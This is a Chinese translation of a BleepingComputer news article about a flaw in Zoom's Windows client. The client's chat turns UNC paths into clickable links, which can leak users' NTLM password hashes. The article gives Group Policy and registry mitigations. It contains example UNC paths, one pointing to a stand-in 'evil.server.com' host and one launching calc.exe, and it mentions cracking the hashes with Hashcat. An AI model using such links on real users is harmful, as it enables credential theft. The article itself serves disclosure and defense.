Zoom客户端存在Windows凭据泄漏缺陷

近日，Zoom软件的Windows版客户端被曝出其聊天功能存在UNC路径注入漏洞，可让攻击者通过某条链接窃取到用户的Windows凭证。

在正常使用Zoom客户端时，会议参与者可以通过聊天界面发送文本消息来进行交流。

而在发送聊天消息时，其中任何URL都会被转换成超链接，其他成员可以直接单击它们，在默认浏览器中打开Web页面。

而安全研究员@_g0dmode发现Zoom客户端还会将Windows网络的UNC路径转换成聊天消息中的可点击的链接。

从上面的聊天消息截图可以看到常规的URL链接和UNC路径\\evil.server.com\images\cat.jpg的对比，用户都可以直接点击。

威胁

当一名用户单击UNC路径链接时，Windows将尝试使用SMB文件共享协议连接到远程站点，以打开远程服务器上的cat.jpg文件。

而在以上默认过程中，Windows将发送用户的登录名和他们的密码哈希（NTLM），对于攻击者来说，他们可以使用Hashcat等免费工具对用户的密码哈希值进行破解。

安全研究Matthew Hicke对此进行了测试，正如你在下图看到的，他能够捕获发送到文件共享服务器上的NTLM密码哈希（通过用户点击链接）。BleepingComputer也能够在本地测试中成功复现。

而在当前显卡和CPU的强大性能下，像Hashcat这样的程序可以快速破解出明文密码。例如，对于较为简单的密码，其哈希值在16秒内就被破解。

Hickey还告诉BleepingComputer，除了窃取Windows凭据外，单击UNC链接还有可能启动本地计算机上的程序。

例如，单击UNC路径\\127.0.0.1\C$\windows\system32\calc.exe，将尝试在计算机上启动windows计算器。不过幸运的是，在程序执行之前，Windows会提示用户是否允许程序运行。

为了最终解决这个安全问题，Zoom需要让聊天系统不对UNC路径进行转换处理。

Hickey告诉BleepingComputer。他已经通知了Zoom，而且也在Twitter上公布了详情。

BleepingComputer也就这个漏洞联系了Zoom，但目前还没有得到回复。

临时防御措施

对于那些不想等待修复的人，可以启用一个组策略，防止在单击UNC链接时将你的NTML自动发送到远端服务器。

这个策略被称为Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers，可以在组策略编辑器的以下路径中找到。

Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

如果你的策略配置为Deny ALL，则在访问共享文件时，Windows将不再自动将你的NTLM凭据发送到远程服务器。

需要注意的是，当在加入域的机器上配置此策略时，若访问共享文件可能会遇到问题。你可以查看这篇文章来了解更多信息。

如果你是Windows 10家庭用户，将无法访问组策略编辑器，必须使用Windows注册表来配置此策略。

可以通过在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0键下创建RestrictSendingNTLMTraffic注册表值并将其设置为2来实现。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
"RestrictSendingNTLMTraffic"=dword:00000002

要正确地创建此值，Windows用户需要以管理员身份启动注册表编辑器。当正确配置了上述注册表设置后，RestrictSendingNTLMTraffic的值如下图所示。

在配置相关策略时，没有必要重启计算机。

而要恢复发送NTLM凭据的默认行为，只需删除RestrictSendingNTLMTraffic来禁用策略即可。

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://www.bleepingcomputer.com/news/security/zoom-client-leaks-windows-login-credentials-to-attackers/